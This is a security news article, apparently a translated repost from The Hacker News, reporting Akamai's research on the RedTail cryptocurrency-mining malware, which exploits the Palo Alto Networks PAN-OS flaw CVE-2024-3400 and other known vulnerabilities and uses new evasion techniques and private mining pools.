News
RedTail cryptocurrency mining malware exploits Palo Alto Networks firewall vulnerability
May 30, 2024Press roomVulnerability/Cryptocurrency
The threat actors behind the Red tail Cryptocurrency mining malware has added to its arsenal of exploits with a recently disclosed security flaw affecting Palo Alto Networks’ firewalls.
According to findings from web security and infrastructure firm Akamai, the addition of the PAN-OS vulnerability to its toolkit has been complemented by updates to the malware, which now incorporates new anti-analysis techniques.
“Attackers have taken a step forward by employing private cryptocurrency mining pools for greater control over mining results despite increased operational and financial costs,” said security researchers Ryan Barnett, Stiv Kupchik and Maxim Zavodchik in a technician relationship shared with The Hacker News.
The infection sequence discovered by Akamai exploits a now-patched vulnerability in PAN-OS tracked as CVE-2024-3400 (CVSS Score: 10.0) which could allow an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
A successful exploitation is followed by the execution of commands designed to retrieve and execute a bash shell script from an external domain which, in turn, is responsible for downloading the RedTail payload based on the CPU architecture.
Other RedTail propagation mechanisms involve exploitation of known security flaws in TP-Link (CVE-2023-1389), ThinkPHP (CVE-2018-20062), Ivanti Connect Secure (CVE-2023-46805, and CVE-2024- 21887) and VMWare Workspace ONE Access and Identity Manager (CVE-2022-22954).
RedTail was first documented by security researcher Patryk Mahowiak in January 2024 in connection with a campaign that exploited the Log4Shell vulnerability (CVE-2021-44228) to distribute malware on Unix-based systems.
Then, in March 2024, Barracuda Networks disclosed details on cyber attacks exploiting flaws in SonicWall (CVE-2019-7481) and Visual Tools DVR (CVE-2021-42071) to install variants of the Mirai botnet, as well as shortcomings in ThinkPHP for deploying RedTail.
The latest version of the miner spotted in April packs significant updates as it includes an encrypted mining setup used to launch the built-in XMRig miner.
Another notable change is the absence of a cryptocurrency wallet, indicating that threat actors may have switched to a cryptocurrency wallet private mining pool or a proxy pool to gain financial benefits.
“The setup also shows that threat actors are trying to optimize the mining operation as much as possible, indicating a deep understanding of crypto-mining,” the researchers said.
“Unlike the previous RedTail variant reported in early 2024, this malware uses advanced evasion and persistence techniques. It forks multiple times to hinder analysis by debugging the process and kills any instance of [GNU Debugger] finds.”
Akamai described RedTail as having a high level of polish, something not commonly seen among cryptocurrency miner malware families out there.
“The investments required to run a private cryptocurrency mining operation are significant, including staff, infrastructure, and obfuscation,” the researchers concluded. “This sophistication could be indicative of a nation-state sponsored attack group.”
Did you find this article interesting? Follow us on Twitter AND LinkedIn to read the most exclusive content we publish.
Fuente